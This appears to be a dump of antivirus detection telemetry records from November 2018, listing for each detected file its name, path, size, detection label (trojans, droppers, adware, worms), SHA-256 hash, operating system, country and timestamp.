  Row(detection=Row(filename='78bd4880fc42aa752d3845e915df5031de8c30a39398aebcc96809652e060885', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\78BD4880FC42AA752D3845E915DF5031DE8C30A39398AEBCC96809652E060885', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='78bd4880fc42aa752d3845e915df5031de8c30a39398aebcc96809652e060885', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bnsxcda2.exe', filepath='c:\\users\\X\\appdata\\local\\ef432080-1430173224-1452-bff1-a7a2cfeff041\\bnsxcda2.exe', filesize=192000, name='APPL/RedCap.d6a4f9.#M1.#R1'), hash='d6a4f91036b4cad586ba56cf847f8851a2ce6b3ff9ca5babf4c3c1a761367e4b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\runonce.exe', parentsize=47616, timestamp='2018-11-01T23:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183041-16acb590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_306862dd\\AVSCAN-20181101-183012-1293AFAF\\AVSCAN-20181101-183041-16ACB590', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:30:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083528-6761ade6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4676877a\\AVSCAN-20181101-083448-5FCD14D4\\AVSCAN-20181101-083528-6761ADE6', filesize=20000, name='TR/Agent.40960.AH.#M1.#R1'), hash='d69199392d0b795b68a5fc8808f37fb792058a501230a3e28a87c67fbc5d8d24', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13094\\drp\\FORCED\\NTx86\\7040\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='9350a0fc0253262229e6cc2cfbea6affb4c36f783b49a92245054c11d7a305c8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:36:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.02acb3d59660479fbf4faf53c0b97d85.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\38CZBVHE\\PConverter.02acb3d59660479fbf4faf53c0b97d85.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CkZRKtaJ\\\\\\/kii1nyl.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:43:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141836-be50c1e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12ae228e\\AVSCAN-20181101-141728-B56117D1\\AVSCAN-20181101-141836-BE50C1E0', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ce27d4e00979f35677dcd9807ca81ac44d33e94e2d93db5abb9c52d4bed67ec5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\CE27D4E00979F35677DCD9807CA81AC44D33E94E2D93DB5ABB9C52D4BED67EC5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ce27d4e00979f35677dcd9807ca81ac44d33e94e2d93db5abb9c52d4bed67ec5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsc9125.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T17:46:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\new_313D\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110219-b91bbef0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110219-B91BBEF0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76ae25a7110cae394c1bbe6ea856871fe9cd525bd0e41e2e495e2e90d790701d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\76AE25A7110CAE394C1BBE6EA856871FE9CD525BD0E41E2E495E2E90D790701D', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='76ae25a7110cae394c1bbe6ea856871fe9cd525bd0e41e2e495e2e90d790701d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:19:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[7].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[7].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\78F947BA30F53EA42351886328646CE887FC2BC67957B384BD07E6939C9D281B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003431-86c2e92e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003431-86C2E92E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:58:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:27:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T22:45:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215017-d7af4252', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e8942c23\\AVSCAN-20181101-214228-937D9B6E\\AVSCAN-20181101-215017-D7AF4252', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:50:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003348-82073f19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003348-82073F19', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wntool.exe', filepath='C:\\Program Files (x86)\\WanNengWBInput\\9.8.0.0410\\WnTool.exe', filesize=1972000, name='PUA/Softcnapp.Gen7.#M300.#R604549'), hash='6a0b1045606c9c9cbe63317600e0f2877a9558ac19ead581ccfaced576c62f5b', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T01:44:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053136-129f6d61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053136-129F6D61', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='af1v16.exe', filepath='C:\\Download Software\\af1v16.exe', filesize=64000, name='TR/Crypt.ULPM.Gen.#M300.#R4004'), hash='3ff29538c79d03531216faa7dbff7f24fbe90a046da1452cbe670b9ad9d2ed6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:17:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000319-2899663a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90cb24d3\\AVSCAN-20181102-000244-24B996B4\\AVSCAN-20181102-000319-2899663A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.620\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.620\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:53:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diner_dash_5-boom_collectors_edition.exe', filepath='F:\\العاب\\العاب بنات\\الطبخ\\Mazika2Day.com_ Diner Dash 5 By adam.sa21 - Copy\\Diner_Dash_5-Boom_Collectors_Edition.exe', filesize=3328000, name='W32/Ramnit.CD.#M1.#R1'), hash='456d9f3f71feb307f7c9657c5f2d23501c986da7bdaffb8f71c7eab3eb3e0008', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:29:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180120-0f138535', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6240dade\\AVSCAN-20181101-175948-0294221F\\AVSCAN-20181101-180120-0F138535', filesize=1920000, name='TR/Hesv.rfwaf.#M1.#R1'), hash='39f6946c1a066b1cbde5f405ec3c9b9221fdd5c30ca0fb763d6876c803c1f71c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:01:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='尚未確認的 574380.crdownload', filepath='C:\\Users\\X\\Downloads\\尚未確認的 574380.crdownload', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.pif', filepath='F:\\New folder\\Corel Draw 12\\Setup\\Setup.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000422a', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000422a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='borella sabrina.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\BORELLA SABRINA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:27:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsv9F3E.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T22:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213730-653af3f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213730-653AF3F6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='evernotenw.exe', filepath='C:\\Program Files (x86)\\Evernote\\Evernote\\NodeWebKit\\EvernoteNw.exe', filesize=42860000, name='W32/Parite.#M1.#R1'), hash='b23c9e88dcc9bbd593387bb828893dd0862454e39d73d7cdc22ecbd4c811f70f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cLArZI+tVEaa0b7n.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:57:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0003305.exe', filepath='D:\\Bo PM Phong Canh\\Du Lieu Cu truoc\\Chu 4 ngo\\gho\\du lieu o D\\System Volume Information\\_restore{3EEE7538-FED8-4189-B1EA-9ED94E4594E9}\\RP12\\A0003305.exe', filesize=20992000, name='HEUR/AGEN.1006275.#M1.#R1'), hash='9adf698d3283bd72e49327542059c7dad7a59c3b2c32aa50d60d3155606b9719', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T07:59:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='llksidqr.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\LlkSIDqR.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T07:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='microsoft office 2016 activator (updated).exe', filepath='C:\\Users\\X\\Desktop\\Microsoft Office 2016 Activator (Updated).exe', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='e53898153ce873b2ad5777a9d89306ebf3b25a0ebd5e0e0b2df2984810f7045c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbeetle.bug.3 .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\gBeetle.Bug.3 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='aaa02e3e86f7ecc3ca479042820a9c070535ad097868d4436f0bab6ff797def6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9eb23b92886e930fd8ca12cb0322308f9d22afc200ef6c9d19fd09ca2ffa865a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\9EB23B92886E930FD8CA12CB0322308F9D22AFC200EF6C9D19FD09CA2FFA865A', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='9eb23b92886e930fd8ca12cb0322308f9d22afc200ef6c9d19fd09ca2ffa865a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:25:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200150-74d1349a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-200125-710AC37B\\AVSCAN-20181101-200150-74D1349A', filesize=64000, name='VBA/Dldr.Agent.dserd.#M1.#R1'), hash='b285603f06baa809f49c91a2fe8abe904fb9ce06954359d024a791c79f8f8f4d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\dtzk5w2zw3n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:16:07Z'), dt=datetime.date(2018, 11, 1)),
